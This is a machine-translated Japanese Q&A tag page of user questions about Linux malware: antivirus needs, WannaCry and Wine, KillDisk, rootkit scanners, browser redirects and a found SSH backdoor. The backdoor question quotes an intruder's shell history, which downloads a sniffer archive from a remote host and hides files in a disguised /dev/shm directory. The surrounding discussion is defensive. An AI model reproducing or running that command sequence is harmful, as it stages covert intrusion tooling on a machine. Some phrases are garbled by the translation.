タグ付けされた質問 「malware」

悪意のあるソフトウェアに関する質問

24
ウイルス対策ソフトウェアをインストールする必要がありますか?[閉まっている]
昨日、ウィルススキャナーパッケージclamtkとklamavUbuntuソフトウェアセンターを見つけるまで、UbuntuまたはLinuxディストリビューションでウィルスをスキャンする必要はないと考えました。 これは、次の質問につながります。 LinuxとWindowsでウイルスはどう違うのですか? 保護の戦略はLinuxとWindowsでどのように異なりますか? システムにウイルススキャナーパッケージをインストールする必要がありますか?もしそうなら、どちらがより良い選択肢でしょうか?
223 malware  antivirus 


1
Ubuntu 18で「新しいウイルスがデータを盗む!」という通知
最近、Firefoxを開くたびに、通知センターにメッセージが表示されます。常に同じではなく、変化し続けます。以下に例を示します。 常にこれとは限りません。他のメッセージも表示され、クリックするとフィッシングサイトに送信されます。どうやって手に入れたのかわかりません。 誰かがそれを取り除くのを手伝ってもらえますか? Clamアンチウイルスを試しましたが、何も見つかりませんでした。

4
「Wanna Cry」ランサムウェアがLinuxユーザーに与える可能性のある影響は何ですか?
Microsoft Windowsを標的とするランサムウェアがデータを暗号化したため、支払わなければならない300の身代金があることが明らかになりました。Linuxユーザーは、たとえばワインを使用している場合、これから保護するためにどのような手順が必要ですか? このランサムウェアは、コンピューターにハッキングするためにNSAによって開発されたツールに基づいていることが広く報告されています。NSAツールは、シャドウブローカーと呼ばれるハッカーグループによって使用されました。コードはGithubにあります。 マイクロソフトは、2017年3月14日にこの脆弱性に対するパッチ(MS17-010)をリリースしました。4月14日に集団感染が広がり始めたと報告されています。これはここで議論されます。 6〜8週間でWindows 8.1を起動していないので、最初にWindowsを起動せずにUbuntuからこのパッチを適用できますか?(調査後、ClamAVはLinux側からWindowsパーティションを調べて脆弱性を報告できる可能性がありますが、パッチを適用できる可能性は低いです。最良の方法は、Windowsを再起動してパッチMS17-010を適用することです) Microsoft自動更新を購読している個人および小規模企業は感染していません。組織のイントラネットに対してテストされるため、パッチの適用を遅らせる大規模な組織は、感染する可能性が高くなります。 2017年5月13日、Microsoftは、3年間サポートされていないWindows XP用のパッチをリリースするという異常な一歩を踏み出しました。 wineがセキュリティの更新について何かをしているのであれば、何も言えません。以下のコメントで、ユーザーがwineを実行するとLinuxも感染する可能性があることが報告されました。 「偶然の英雄は」ランサムウェアにキルスイッチを務めたドメイン名を登録しました。ハッカーはプライベートイントラネット上で存在しないドメインを使用していたため、自分自身に感染することはありませんでした。次回はより賢くなるので、この現在のキルスイッチに依存しないでください。SMBv1プロトコルの脆弱性の悪用を防ぐMicrosoftパッチをインストールするのが最善の方法です。 2017年5月14日、Red Hat Linuxは「Wanna Cry」ランサムウェアの影響を受けないと述べました。これは、UbuntuユーザーとRed Hat、CentOS、ArchLinux、Fedoraユーザーを誤解させる可能性があります。Red Hatはwineをサポートしており、以下の回答が有効であることを確認しています。本質的に、Ubuntuや他のLinuxディストリビューションユーザーがこの問題をグーグルで検索しているのは、ここの Red Hat Linuxサポートの回答によって誤解される可能性があります。 2017年5月15日更新。過去48時間にわたって、Microsoftは「Wanna Cry」ランサムウェアから保護するために、Windows 8、XP、Vista、Server 2008、およびServer 2003用のKB4012598と呼ばれるパッチをリリースしました。これらのWindowsバージョンは、自動更新されなくなりました。昨日、Windows 8.1プラットフォームにセキュリティ更新プログラムMS17-010を適用しましたが、古いVistaラップトップでは、パッチKB4012598をダウンロードして手動で適用する必要があります。 モデレーターのメモ:この質問はトピックから外れていません。リスクから保護するためにLinuxユーザーが何らかの手順を実行する必要があるかどうかを尋ねます。 Linux(Ubuntuが該当)に関連し、Wineまたは同様の互換性レイヤー、またはUbuntu Linuxマシン上のVMを実行しているUbuntuユーザーにも関連するため、ここで完全にトピックになります。
64 windows  wine  malware 

11
WindowsウイルスはUbuntuに転送できますか?
コンピューターからWindows 7を削除してUbuntuに置き換える前に、257を超える脅威がありました。私が持っていたトロイの木馬がUbuntuに移行できるかどうかはわかりません。コンピューターが感染する可能性はありますか?私は新しいコンピューターを手に入れたくないので、コンピューターを使用するときは非常に注意しようとしています。 ほんの数年の間、Windows 7とPCしか持っていません。最初に、私はそれをBest Buyに持ち込み、トロイの木馬がコンピューター上にあるはずだと彼らは言った。男はそれを「見た」だけで、彼はそれを工場出荷時の設定に入れたので、私のPCを2回続けて隠した。それから、私はそれをどこかで知っている誰かに持って行き、彼らはそれを再構築しました。しかし、再び多くの問題がありました。 アンチウイルスとプログラム、その他のファイルが目の前で消えていました。Wi-Fiがオフになったため、再びオンにできませんでした。それ自体でシャットダウンします。そして、それは前にそれをしませんでした。 Windows 7からの感染はUbuntuに移行しますか?Windows 7はもう持っていないことを思い出してください。Ubuntuしか持っていません。
50 malware 

3
clamav-エラー:/var/log/clamav/freshclam.logは別のプロセスによってロックされていますか?
私がインストールされているclamavと私はそれがウイルスを識別するために使用するファイルを更新したいです: $ sudo freshclam ERROR: /var/log/clamav/freshclam.log is locked by another process ERROR: Problem with internal logger (UpdateLogFile = /var/log/clamav/freshclam.log). このエラーをどうすればよいですか? 編集: $ sudo lsof /var/log/clamav/freshclam.log COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME freshclam 866 clamav 3wW REG 259,1 100134 10486045 /var/log/clamav/freshclam.log



2
VServerでSSHバックドアが見つかりました。何をすべきか?
昨日、VServerでコマンドの履歴を確認しました。疑わしい行がいくつか見つかりました。 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget aridan.hol.es/sniffer.tgz 206 tar xvf ar 207 tar zxvf ar 208 …
24 ssh  security  malware 

8
マシンにインストールされている可能性のあるマルウェアはどこで確認できますか?
ハッキングされたかどうかを検出するために、ubuntuボックスを分析したいと思います。私の質問は次のとおりです。悪意のあるソフトウェアが開始されているかどうかを確認するためのすべての場所は何ですか?以下は、ある種の生のリストです。 mbr カーネルイメージ(md5があります) / sbin / init(md5があります) / etc / modules内のカーネルモジュール /etc/init.dおよび/ etc / initのすべてのサービススクリプト(md5があります) /etc/rc.local ノーム自動実行 そして? 私の質問は完全に正直で、悪意はありません。私の箱が侵害されたかどうかを検出するだけです。
23 boot  security  malware 

2
署名ベースのルートキットスキャナーですか?
現在、私が知っている唯一のルートキットスキャナーは、ファイルの変更などを比較できるようにルートキットの前にマシンにインストールする必要がchkrootkitあります(例:およびrkhunter)。なぜなら、ルートキットが十分に良ければ、ルートキット検出プログラムも引き継いでしまうからです。 それでは、Ubuntu / Linux用のシグネチャベースのルートキットスキャナーをLiveUSBにインストールして、動作を監視したり、以前の日付のファイルを比較したりせずに、プラグインしたマシンを確実にスキャンできますか?

6
LinuxのマルウェアであるKillDiskからアンチウイルスで保護できますか?
私の親relativeが最近私にメールを送ってきました。彼は最近、アンチウイルスベンダーESETからこの驚くべき見出しに出会いました。 KillDiskがLinuxをターゲットに:$ 250Kの身代金を要求するが、解読できない 電子メールは、ディスクの内容を暗号化し、身代金を要求するソフトウェアの一部を説明し続けています。 私の親relativeは警戒しており、確かにアンチウイルスが今必要であると感じています。 Ubuntuにはアンチウイルスは必要ないと強く感じています。むしろ、Ubuntuユーザーにとって最善の保護は、セキュリティ更新プログラムを迅速にインストールし、定期的なバックアップを保持し、Ubuntu Software Centreなどの信頼できるソースからのソフトウェアのみをインストールすることだと思います。KillDiskの登場により、そのアドバイスは時代遅れになりましたか?

7
「http://domain-error.com」へのリダイレクト
ウェブサイト「http://domain-error.com」にリダイレクトされています。これは、Firefox、Chromium、Google chromeなどで発生しています。ウイルスまたはそれに類似したものに攻撃されているように感じます。 更新:リダイレクトは頻繁に発生しますが、常にではなく、すべてのブラウザーで発生しています。 Firefoxアドオンマネージャーには、「Ubuntuモディフィケーション3.2(無効)」と表示されます。Firefoxプラグインには、「Cisco Systems、Inc.1.5.1が提供するOpenH264ビデオコーデック」が表示されます。/etc/hosts以下のとおりであります: 127.0.0.1 localhost 127.0.1.1 home-desktop # The following lines are desirable for IPv6 capable hosts ::1 ip6-localhost ip6-loopback fe00::0 ip6-localnet ff00::0 ip6-mcastprefix ff02::1 ip6-allnodes ff02::2 ip6-allrouters google.comの結果を次のようにホストします home@home-desktop:~$ host google.com google.com has address 216.58.220.14 google.com has IPv6 address 2404:6800:4009:804::200e ;; connection timed out; no servers could …


1
LibreOfficeのマウスポインターの下にある予期しないアラビア語メッセージ-ウイルス?
これは奇妙です。 今日、LibreOfficeでExcelファイルを開きました。突然、マウスの色が変わり、それに固執したのはアラビア語のメッセージでした。これはループで1秒ごとに変化しました。私は実際にアラビア語を読むことができるので、すぐにそれをアッラーを称賛するイスラムのメッセージ(タクビルを含む)として認識しました。 スクリーンショットは次のとおりです。 最初はファイルに何かがあると思いましたが、LibreOfficeプログラム(ただしLibreOfficeプログラムのみ)で発生することがわかりました。それらが開いていても、LibreOfficeプログラムの上にマウスを置いたときにマウスが変わるだけです。そして、他のどこでも通常に戻ります。また、再インストールはしませんでした 私はソフトウェアアップデーターを実行しようとしました-しかし、いくつかの蒸気リポジトリをロードできなかったというエラーがありますが、それは偶然のようです: Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en_US Failed to fetch http://repo.steampowered.com/steam/dists/precise/steam/i18n/Translation-en ここに別のヒントがあります-私はいくつかのメッセージのいくつかのスクリーンショットを撮ろうとしましたが、それらはすべて同じメッセージ(上記のもの)を表示することになりました。うまくいけば、それは何でも意味します。 最近、怪しいものは何もインストールしていないことに注意してください。LibreOfficeはほとんど使用していません(ドキュメントを操作する必要があるときはいつでもGoogleドライブを使用しています)。 とにかく、これは怖いです。

弊社のサイトを使用することにより、あなたは弊社のクッキーポリシーおよびプライバシーポリシーを読み、理解したものとみなされます。
Licensed under cc by-sa 3.0 with attribution required.